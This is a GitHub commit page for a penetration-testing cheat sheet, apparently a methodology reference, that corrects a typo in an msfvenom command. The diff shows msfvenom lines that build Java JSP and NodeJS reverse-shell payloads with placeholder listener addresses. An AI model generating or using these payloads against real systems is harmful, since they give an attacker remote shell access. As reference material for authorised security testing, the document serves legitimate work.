Skip to content

Commit

Permalink
Fix NodeJS reverse shell
Browse files Browse the repository at this point in the history
  • Loading branch information
nkd3v authored May 27, 2022
1 parent 129cdd6 commit e9e67d2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion generic-methodologies-and-resources/shells/msfvenom.md
Original file line number Diff line number Diff line change
Expand Up @@ -157,7 +157,7 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f w
## NodeJS

```bash
sfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```

# **Script Language payloads**
Expand Down

0 comments on commit e9e67d2

Please sign in to comment.